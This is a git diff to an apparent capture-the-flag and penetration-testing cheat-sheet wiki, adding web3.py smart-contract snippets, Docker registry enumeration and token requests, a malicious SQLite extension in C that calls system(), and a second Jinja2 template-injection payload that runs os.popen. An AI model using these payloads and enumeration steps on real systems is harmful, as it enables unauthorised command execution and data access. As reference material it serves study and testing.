diff --git a/README.md b/README.md
index 6efb978..375ded4 100644
--- a/README.md
+++ b/README.md
@@ -8,6 +8,7 @@
## 📇 Index
- [📇 Index](/wiki/Index.md)
+- [💸 Block-chain](/wiki/BlockChain.md)
- [🔒 Crypto](/wiki/Crypto.md)
- [☁️ Cloud](/wiki/Cloud.md)
- [🗄️ Database](/wiki/Database.md)
@@ -31,8 +32,10 @@
- [Cheat.sh](http://cheat.sh/)
- [Explain Shell](https://explainshell.com/)
- [GTFOBins](https://gtfobins.github.io/)
+- [Lolbas](https://lolbas-project.github.io/)
+- [WADComs](https://wadcoms.github.io/)
+- [The Hacker Recipes](https://www.thehacker.recipes/)
- [HackTricks](https://book.hacktricks.xyz/)
-- [Les Tutos de Processus](https://lestutosdeprocessus.fr/ctf-cheat-sheet/)
- [OWASP Cheat Sheet](https://cheatsheetseries.owasp.org/index.html)
## ❤️ Contributors
diff --git a/wiki/BlockChain.md b/wiki/BlockChain.md
new file mode 100644
index 0000000..e650c66
--- /dev/null
+++ b/wiki/BlockChain.md
@@ -0,0 +1,99 @@
+
+
+---
+
+- [Web3.py](#web3py)
+- [Usefull link](#usefull-link)
+
+# Web3.py
+
+Library to interact with Ethereum blockchain:
+- [web3.py](https://pypi.org/project/web3/)
+- [py-solc-x](https://pypi.org/project/py-solc-x/)
+- [solc-select](https://github.com/crytic/solc-select)
+
+### Create new instance of web3.py
+> Note: You need to have a RPC_URL to connect to the blockchain
+
+```py
+from web3 import Web3
+
+w3_instance = Web3(Web3.HTTPProvider("")
+assert w3_instance.is_connected()
+```
+
+### Get storage at address (usefull to get private variables):
+> Note: You need to have a web3 instance (see previous snippet)
+
+```py
+storage = w3_instance.eth.get_storage_at("", )
+
+# Example:
+storage = w3_instance.eth.get_storage_at("0xfce177A183CDff53910b5399Ee3ADcC982c1b5bE", 0)
+```
+
+### Get block information:
+
+```py
+w3_instance.eth.get_block(, )
+w3_instance.eth.get_block(0, True)
+```
+
+### Get contract instance:
+
+```py
+from solcx import compile_source
+
+contract_code = open("MyContract.sol", "r").read()
+compiled = compile_source(
+ contract_code,
+ output_values=['abi', 'bin']
+)
+
+contract_interface = compiled[':MyContract']
+bytecode = contract_interface['bin']
+abi = contract_interface['abi']
+contract = w3_instance.eth.contract(address=contract_address, abi=abi, bytecode=bytecode)
+```
+
+### Get public variables or view/pure functions:
+> Note: You need to have a contract instance (see previous snippet)
+
+```py
+contract.functions.solver().call()
+```
+
+### Call transact function (my_awesome_function):
+> Transact function need to be called with a private key and a caller address
+
+```py
+private_key = ""
+caller = ""
+
+Chain_id = w3_instance.eth.chain_id
+nonce = w3_instance.eth.get_transaction_count(caller)
+
+tx_data = {"chainId": Chain_id, "from": caller, "nonce": nonce}
+call_function = contract.functions.my_awesome_function().build_transaction(tx_data)
+
+signed_tx = w3_instance.eth.account.sign_transaction(call_function, private_key=private_key)
+send_tx = w3_instance.eth.send_raw_transaction(signed_tx.rawTransaction)
+tx_receipt = w3_instance.eth.wait_for_transaction_receipt(send_tx)
+print(tx_receipt)
+```
+
+### You can also call payable function you just need to add the value, and gas in the tx_data:
+> Note: Gas and gasPrice need to be calculated before.
+
+```py
+tx_data = {'nonce': nonce, 'to': contract_address, 'value': 500000000000000000, 'gas': , 'gasPrice': }
+```
+
+# Usefull link
+
+- [Etherum transaction vizualiser](https://github.com/avan-pra/graph-blockren)
+- [Slither a smart contract analyzer](https://github.com/crytic/slither)
+- [Web3.py doc](https://web3py.readthedocs.io/en/stable/quickstart.html)
\ No newline at end of file
diff --git a/wiki/Cloud.md b/wiki/Cloud.md
index a30ccd5..eccdb92 100644
--- a/wiki/Cloud.md
+++ b/wiki/Cloud.md
@@ -8,6 +8,7 @@
- [AWS](#aws)
- [Kubernetes](#kubernetes)
- [Azure](#azure)
+- [Docker registry](#docker-registry)
# AWS
@@ -261,3 +262,76 @@ table_service = TableService(account_name="...", sas_token='se=&sp=&sv=<
print(table_service.exists('
'))
print(list(table_service.query_entities('
')))
```
+
+
+# Docker registry
+### Recon
+
+> By default, docker registry run on port 5000.
+> The first step to do is to know if the registry need authentication token or not. You can do this by sending a request to the registry.
+
+```bash
+curl -I http://:5000/v2/
+```
+
+### Get authentication token
+
+> With the header `www-authenticate` you can know if the registry need authentication token or not.
+
+Example of response:
+```
+Www-Authenticate: Bearer realm="http://:5001/",service="Docker registry",error="invalid_token"
+```
+
+From this response you can try to get a token, the realm is the url to get the token.
+
+Examples of requests:
+
+```bash
+# Try to get only access on catalog
+curl http:///auth?scope=registry:catalog:*&service=
+```
+
+```bash
+# Try to get only pull,push right on an image
+curl http:///auth?scope=repository::*&service=
+```
+
+```bash
+# Try to get only pull right on an image
+curl http:///auth?scope=repository::pull&service=
+```
+
+### Get all images names
+
+> You can get all images names by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://:5000/v2/_catalog
+```
+
+### Get all tags for an image
+
+> You can get all tags for an image by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://:5000/v2//tags/list
+```
+
+### Get image manifest
+
+> You can get image manifest by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://:5000/v2//manifests/
+```
+
+### Get image layer
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://:5000/v2//blobs/
+```
+
+### Automated tools
+
+You can also use an automated tool like [DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber).
diff --git a/wiki/Database.md b/wiki/Database.md
index d8e2b1d..2a798a4 100644
--- a/wiki/Database.md
+++ b/wiki/Database.md
@@ -60,6 +60,24 @@ or open in vs code
.tables
```
+### Load extension
+> Sometimes you have to load extension to get some privileges
+> Note: the function name need to be `sqlite3__init`
+
+```c
+// gcc -s -g -fPIC -shared my_extension.c -o my_extension.so
+#include
+int sqlite3_my_extension_init(){
+ system("id");
+ return 0;
+}
+```
+
+After that you can load the extension on sqlite with:
+```sql
+load_extension("my_extension.so");
+```
+
# Postgres
> Port: 5432
diff --git a/wiki/Web.md b/wiki/Web.md
index fe110d9..4fdd19a 100644
--- a/wiki/Web.md
+++ b/wiki/Web.md
@@ -287,6 +287,7 @@ ${{1+1}}
### Python (Jinja2)
```
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{request.__class__._load_form_data.__globals__.__builtins__.__import__("os").popen("id").read()}}
```
### Golang